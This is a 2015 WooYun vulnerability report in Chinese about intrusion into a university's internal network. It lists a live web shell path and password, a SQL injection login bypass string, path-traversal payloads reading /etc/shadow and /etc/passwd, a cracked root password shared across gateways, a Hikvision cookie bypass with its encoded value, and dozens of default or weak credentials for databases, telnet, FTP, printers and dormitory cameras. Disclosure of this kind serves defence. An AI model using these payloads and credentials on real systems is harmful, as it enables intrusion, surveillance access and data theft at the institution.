当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153027

漏洞标题:南京信息工程大学内网漫游

相关厂商:南京信息工程大学

漏洞作者: Jyhtpy

提交时间:2015-11-09 17:16

修复时间:2015-11-22 14:08

公开时间:2015-11-22 14:08

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

由于某系统存在的问题,导致进入到内网。
简单的测试了一下。

详细说明:

首先是这个http://**.**.**.**/bugs/wooyun-2010-061930
发现http://**.**.**.**/nxdsy/
过程不多说
shell地址
http://**.**.**.**/nxdsy/upfiles/news/test.asp 密码cmd
发现已被加后门

1.PNG


ping一下内网地址是通的

捕获.PNG


然后就是主题了,以下内容请管理适当打码。

漏洞证明:

0x00
使用nmap简单探测了一下B段的存活主机

4}HL]LA3C8T1]SL2P{9}4(R.jpg


而后对各个网段进行测试
0x01 注入
**.**.**.**/Index.aspx 天气录播平台
admin'or'1'='1
可直接登录管理员

X}F(5L[J2%HTL{15G3G3~YL.jpg


http://**.**.**.**/managerOneGgxxfb.action?fbxxid=2c90848d4834497901483f5b50bc0001
一卡通中心

x.PNG


x1.PNG


0x02 任意文件读取
发现智能数据网关 存在文件读取漏洞
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
/public/../../../../../../../etc/shadow

2LT35MJT%GI10HR2AIMPW[V.jpg


**.**.**.**
**.**.**.**
**.**.**.**
/../../../../../../../etc/passwd
直接读取shadow文件 解密
各个网关服务器都使用相同密码
root/sg3907

{U@@S@83W2PXE_7HRCGQ~BG.jpg


L[8Z(]A4%ESG8TUXVDHR3{N.jpg


拿下网关服务器
0x03 未授权访问+弱口令
**.**.**.**/gateway.html
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
虽然不知道干什么用的,不过可以直接重启机器。

5OJR~DIU$(AET~_CY33H)KR.jpg


另外,以上ip均存在telnet以及ftp弱口令root/root,权限很大

ftp.PNG


telnet.PNG


**.**.**.**
**.**.**.**
**.**.**.**
打印机未授权访问

dayin.PNG


0x04 目录遍历
**.**.**.**/upload/
/db/
/bin/
/db/
/images/
/reports/
/scripts/
/styles/
/upload/
/xml/

列目录.PNG


电子收费系统
挺多信息的
由于不知道为什么sqlserver未连接就没有尝试登录后台了

捕获.PNG


**.**.**.**/images/
/a/
/m/
/plus/
Dedecms的,好像是遥感院的网站
0x05 远程代码执行
**.**.**.**
**.**.**.**
**.**.**.**
IIS7 HTTP.sys远程代码执行漏洞

x.PNG


返回416
存在漏洞
0x06 任意文件上传
http://**.**.**.**
现在内网才能访问
详情见http://**.**.**.**/bugs/wooyun-2010-075840
得到shell

I9JJ2B$[(A{X8M2190(5Z_W.png


http://**.**.**.**/noticespic/sqzr20153706123742.jsp
administrator权限

捕获.PNG


似乎只对外开放80端口
不过有reDuh开个http隧道连就好
这边就不深入了
0x07 硬编码绕过
海康威视的问题
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**0
**.**.**.**
新建一个cookie为
userInfo80
/
YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw==

~8F}FUI13N4WBX3IO~JZ@X0.jpg


直接访问http://ip/doc/page/main.asp

LMHBZ[B)YX$H(NZ@$Q]66[O.png


0x08 弱口令
**.**.**.**4
**.**.**.**3
**.**.**.**7
**.**.**.**5
**.**.**.**6
文德楼监控
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**-164
各个宿舍监控
海康威视默认密码12345

2)LQ_G20{I48D73$DZH~[EU.png


**.**.**.**/
Administrator/空
**.**.**.**/
打印服务器
admin/admin

dyj.PNG


**.**.**.**/
财务实验室智能家居系统
(开关灯和空调什么鬼)
admin/admin

K[A)OYLYYY7`VVH%D_%%{1D.jpg


**.**.**.**/
IBM设备
admin/admin

ibm.PNG


**.**.**.**:8080/
**.**.**.**:8080/
admin/admin
可查看宿舍进出记录

ss.PNG


最后的最后
还有一些mssql的弱口令,可直接控制服务器
**.**.**.**(机房管理系统)
sa/123456
Administrator/1
**.**.**.**
sa/sa
**.**.**.**
sa/sa
**.**.**.**(继续教育学院)
sa/123456
**.**.**.**
sa/空
**.**.**.**
sa/空
**.**.**.**
sa/空
**.**.**.**(虚拟交易所??)
sa/sa
Administrator/emlab
**.**.**.**(公务员考试模拟系统)
sa/空
**.**.**.**
sa/空
还有两个外网地址的:
**.**.**.**
sa/空
**.**.**.**(研究生办)
sa/1
贴几个图证明一下

jf.PNG


jxjy.PNG


yjs.PNG


修复方案:

版权声明:转载请注明来源 Jyhtpy@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-22 14:08

厂商回复:

最新状态:

暂无